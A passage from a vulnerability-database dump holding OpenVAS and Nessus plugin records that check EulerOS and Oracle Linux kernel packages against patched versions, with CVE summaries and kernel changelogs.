__xfs_get_blocks() in the fs/xfs/xfs_aops.c because of a race condition between direct and memory-mapped I/O associated with a hole in a file that is handled with BUG_ON() instead of an I/O failure. This allows a local unprivileged attacker to cause a system crash and a denial of service.(CVE-2016-10741)\n\nA use-after-free flaw can occur in the Linux kernel due to a race condition between packet_do_bind() and packet_notifier() functions called for an AF_PACKET socket. An unprivileged, local user could use this flaw to induce kernel memory corruption on the system, leading to an unresponsive system or to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out. (CVE-2018-18559)\n\nAn issue was discovered in can_can_gw_rcv in net/can/gw.c in the Linux kernel through 4.19.13. The CAN frame modification rules allow bitwise logical operations that can be also applied to the can_dlc field. Because of a missing check, the CAN drivers may write arbitrary content beyond the data registers in the CAN controller's I/O memory when processing can-gw manipulated outgoing frames. This is related to cgw_csum_xor_rel. An unprivileged user can trigger a system crash (general protection fault).(CVE-2019-3701)\n\nA flaw was found in the Linux kernel's ext4 filesystem. A local use ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.62.59.83.h140\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T05:18:26", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - scsi: libfc: sanitize E_D_TOV and R_A_TOV setting\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: use configured rport E_D_TOV (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: additional debugging messages (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: don't advance state machine for incoming\n FLOGI (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not login if the port is already started\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not drop down to FLOGI for\n fc_rport_login (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not take rdata->rp_mutex when processing\n a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug:\n 25933179]\n\n - scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke)\n [Orabug: 25933179]\n\n - xve: arm ud tx cq to generate completion interrupts\n (Ajaykumar Hotchandani) [Orabug: 28267050]\n\n - net: sched: run ingress qdisc without locks (Alexei\n Starovoitov) [Orabug: 29395374]\n\n - bnxt_en: Fix typo in firmware message timeout logic.\n (Michael Chan) [Orabug: 29412112]\n\n - bnxt_en: Wait longer for the firmware message response\n to complete. (Michael Chan) [Orabug: 29412112]\n\n - mm,vmscan: Make unregister_shrinker no-op if\n register_shrinker failed. (Tetsuo Handa) [Orabug:\n 29456281]\n\n - X.509: Handle midnight alternative notation in\n GeneralizedTime (David Howells) [Orabug: 29460344]\n (CVE-2015-5327)\n\n - X.509: Support leap seconds (David Howells) [Orabug:\n 29460344] (CVE-2015-5327)\n\n - X.509: Fix the time validation [ver #2] (David Howells)\n [Orabug: 29460344] (CVE-2015-5327) (CVE-2015-5327)\n\n - be2net: enable new Kconfig items in kernel configs\n (Brian Maly) [Orabug: 29475071]\n\n - benet: remove broken and unused macro (Lubomir Rintel)\n [Orabug: 29475071]\n\n - be2net: don't flip hw_features when VXLANs are\n added/deleted (Davide Caratti) [Orabug: 29475071]\n\n - be2net: Fix memory leak in be_cmd_get_profile_config\n (Petr Oros) [Orabug: 29475071]\n\n - be2net: Use Kconfig flag to support for\n enabling/disabling adapters (Petr Oros) [Orabug:\n 29475071]\n\n - be2net: Mark expected switch fall-through (Gustavo A. R.\n Silva) [Orabug: 29475071]\n\n - be2net: fix spelling mistake 'seqence' -> 'sequence'\n (Colin Ian King) [Orabug: 29475071]\n\n - be2net: Update the driver version to 12.0.0.0 (Suresh\n Reddy) [Orabug: 29475071]\n\n - be2net: gather debug info and reset adapter (only for\n Lancer) on a tx-timeout (Suresh Reddy) [Orabug:\n 29475071]\n\n - be2net: move rss_flags field in rss_info to ensure\n proper alignment (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: re-order fields in be_error_recovert to avoid\n hole (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: remove unused tx_jiffies field from be_tx_stats\n (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: move txcp field in be_tx_obj to eliminate holes\n in the struct (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: reorder fields in be_eq_obj structure (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old custom busy-poll fields (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old AIC info (Ivan Vecera)\n [Orabug: 29475071]\n\n - be2net: Fix error detection logic for BE3 (Suresh Reddy)\n [Orabug: 29475071]\n\n - scsi: sd: Do not override max_sectors_kb sysfs setting\n (Martin K. Petersen) [Orabug: 29596510]\n\n - USB: serial: io_ti: fix div-by-zero in set_termios\n (Johan Hovold) [Orabug: 29487834] (CVE-2017-18360)\n\n - bnxt_en: Drop oversize TX packets to prevent errors.\n (Michael Chan) [Orabug: 29516462]\n\n - x86/speculation: Read per-cpu value of\n x86_spec_ctrl_priv in x86_virt_spec_ctrl (Alejandro\n Jimenez) [Orabug: 29526401]\n\n - x86/speculation: Keep enhanced IBRS on when prctl is\n used for SSBD control (Alejandro Jimenez) [Orabug:\n 29526401]\n\n - USB: hso: Fix OOB memory access in\n hso_probe/hso_get_config_data (Hui Peng) [Orabug:\n 29605982] (CVE-2018-19985) (CVE-2018-19985)\n\n - swiotlb: save io_tlb_used to local variable before\n leaving critical section (Dongli Zhang) [Orabug:\n 29637525]\n\n - swiotlb: dump used and total slots when swiotlb buffer\n is full (Dongli Zhang) [Orabug: 29637525]\n\n - x86/bugs, kvm: don't miss SSBD when IBRS is in use.\n (Quentin Casasnovas) [Orabug: 29642113]\n\n - cifs: Fix use after free of a mid_q_entry (Shuning\n Zhang) [Orabug: 29654888]\n\n - binfmt_elf: switch to new creds when switching to new mm\n (Linus Torvalds) [Orabug: 29677233] (CVE-2019-11190)\n\n - x86/microcode: Don't return error if microcode update is\n not needed (Boris Ostrovsky) [Orabug: 29759756]", "edition": 19, "cvss3": {"score": 4.7, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-05-31T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2019-0022)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11190", "CVE-2015-5327", "CVE-2017-18360", "CVE-2018-19985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2019-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/125615", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2019-0022.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125615);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/13\");\n\n script_cve_id(\"CVE-2015-5327\", \"CVE-2017-18360\", \"CVE-2018-19985\", \"CVE-2019-11190\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2019-0022)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - scsi: libfc: sanitize E_D_TOV and R_A_TOV setting\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: use configured rport E_D_TOV (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: additional debugging messages (Hannes\n Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: don't advance state machine for incoming\n FLOGI (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not login if the port is already started\n (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not drop down to FLOGI for\n fc_rport_login (Hannes Reinecke) [Orabug: 25933179]\n\n - scsi: libfc: Do not take rdata->rp_mutex when processing\n a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug:\n 25933179]\n\n - scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke)\n [Orabug: 25933179]\n\n - xve: arm ud tx cq to generate completion interrupts\n (Ajaykumar Hotchandani) [Orabug: 28267050]\n\n - net: sched: run ingress qdisc without locks (Alexei\n Starovoitov) [Orabug: 29395374]\n\n - bnxt_en: Fix typo in firmware message timeout logic.\n (Michael Chan) [Orabug: 29412112]\n\n - bnxt_en: Wait longer for the firmware message response\n to complete. (Michael Chan) [Orabug: 29412112]\n\n - mm,vmscan: Make unregister_shrinker no-op if\n register_shrinker failed. (Tetsuo Handa) [Orabug:\n 29456281]\n\n - X.509: Handle midnight alternative notation in\n GeneralizedTime (David Howells) [Orabug: 29460344]\n (CVE-2015-5327)\n\n - X.509: Support leap seconds (David Howells) [Orabug:\n 29460344] (CVE-2015-5327)\n\n - X.509: Fix the time validation [ver #2] (David Howells)\n [Orabug: 29460344] (CVE-2015-5327) (CVE-2015-5327)\n\n - be2net: enable new Kconfig items in kernel configs\n (Brian Maly) [Orabug: 29475071]\n\n - benet: remove broken and unused macro (Lubomir Rintel)\n [Orabug: 29475071]\n\n - be2net: don't flip hw_features when VXLANs are\n added/deleted (Davide Caratti) [Orabug: 29475071]\n\n - be2net: Fix memory leak in be_cmd_get_profile_config\n (Petr Oros) [Orabug: 29475071]\n\n - be2net: Use Kconfig flag to support for\n enabling/disabling adapters (Petr Oros) [Orabug:\n 29475071]\n\n - be2net: Mark expected switch fall-through (Gustavo A. R.\n Silva) [Orabug: 29475071]\n\n - be2net: fix spelling mistake 'seqence' -> 'sequence'\n (Colin Ian King) [Orabug: 29475071]\n\n - be2net: Update the driver version to 12.0.0.0 (Suresh\n Reddy) [Orabug: 29475071]\n\n - be2net: gather debug info and reset adapter (only for\n Lancer) on a tx-timeout (Suresh Reddy) [Orabug:\n 29475071]\n\n - be2net: move rss_flags field in rss_info to ensure\n proper alignment (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: re-order fields in be_error_recovert to avoid\n hole (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: remove unused tx_jiffies field from be_tx_stats\n (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: move txcp field in be_tx_obj to eliminate holes\n in the struct (Ivan Vecera) [Orabug: 29475071]\n\n - be2net: reorder fields in be_eq_obj structure (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old custom busy-poll fields (Ivan\n Vecera) [Orabug: 29475071]\n\n - be2net: remove unused old AIC info (Ivan Vecera)\n [Orabug: 29475071]\n\n - be2net: Fix error detection logic for BE3 (Suresh Reddy)\n [Orabug: 29475071]\n\n - scsi: sd: Do not override max_sectors_kb sysfs setting\n (Martin K. Petersen) [Orabug: 29596510]\n\n - USB: serial: io_ti: fix div-by-zero in set_termios\n (Johan Hovold) [Orabug: 29487834] (CVE-2017-18360)\n\n - bnxt_en: Drop oversize TX packets to prevent errors.\n (Michael Chan) [Orabug: 29516462]\n\n - x86/speculation: Read per-cpu value of\n x86_spec_ctrl_priv in x86_virt_spec_ctrl (Alejandro\n Jimenez) [Orabug: 29526401]\n\n - x86/speculation: Keep enhanced IBRS on when prctl is\n used for SSBD control (Alejandro Jimenez) [Orabug:\n 29526401]\n\n - USB: hso: Fix OOB memory access in\n hso_probe/hso_get_config_data (Hui Peng) [Orabug:\n 29605982] (CVE-2018-19985) (CVE-2018-19985)\n\n - swiotlb: save io_tlb_used to local variable before\n leaving critical section (Dongli Zhang) [Orabug:\n 29637525]\n\n - swiotlb: dump used and total slots when swiotlb buffer\n is full (Dongli Zhang) [Orabug: 29637525]\n\n - x86/bugs, kvm: don't miss SSBD when IBRS is in use.\n (Quentin Casasnovas) [Orabug: 29642113]\n\n - cifs: Fix use after free of a mid_q_entry (Shuning\n Zhang) [Orabug: 29654888]\n\n - binfmt_elf: switch to new creds when switching to new mm\n (Linus Torvalds) [Orabug: 29677233] (CVE-2019-11190)\n\n - x86/microcode: Don't return error if microcode update is\n not needed (Boris Ostrovsky) [Orabug: 29759756]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2019-May/000941.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11190\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-124.27.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-02-01T05:11:34", "description": "Description of changes:\n\n[4.1.12-124.27.1.el6uek]\n- scsi: libfc: sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug: 25933179]\n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179]\n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050]\n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374]\n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112]\n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112]\n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. (Tetsuo Handa) [Orabug: 29456281]\n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071]\n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071]\n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071]\n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071]\n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071]\n- be2net: Mark expected switch fall-through (Gustavo A. R. Silva) [Orabug: 29475071]\n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071]\n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071]\n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071]\n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071]\n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071]\n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071]\n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071]\n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071]\n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. Petersen) [Orabug: 29596510]\n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462]\n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401]\n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401]\n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525]\n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525]\n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. (Quentin Casasnovas) [Orabug: 29642113]\n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888]\n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]", "edition": 19, "cvss3": {"score": 4.7, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-05-17T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2019-4642)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11190", "CVE-2015-5327", "CVE-2017-18360", "CVE-2018-19985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2019-4642.NASL", "href": "https://www.tenable.com/plugins/nessus/125235", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-4642.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125235);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/15\");\n\n script_cve_id(\"CVE-2015-5327\", \"CVE-2017-18360\", \"CVE-2018-19985\", \"CVE-2019-11190\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2019-4642)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-124.27.1.el6uek]\n- scsi: libfc: sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179]\n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug: 25933179]\n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179]\n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050]\n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374]\n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112]\n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112]\n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. (Tetsuo Handa) [Orabug: 29456281]\n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071]\n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071]\n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071]\n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071]\n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071]\n- be2net: Mark expected switch fall-through (Gustavo A. R. Silva) [Orabug: 29475071]\n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071]\n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071]\n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071]\n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071]\n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071]\n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071]\n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071]\n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071]\n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071]\n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. Petersen) [Orabug: 29596510]\n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462]\n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401]\n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401]\n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525]\n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525]\n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. (Quentin Casasnovas) [Orabug: 29642113]\n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888]\n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-May/008739.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-May/008740.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n 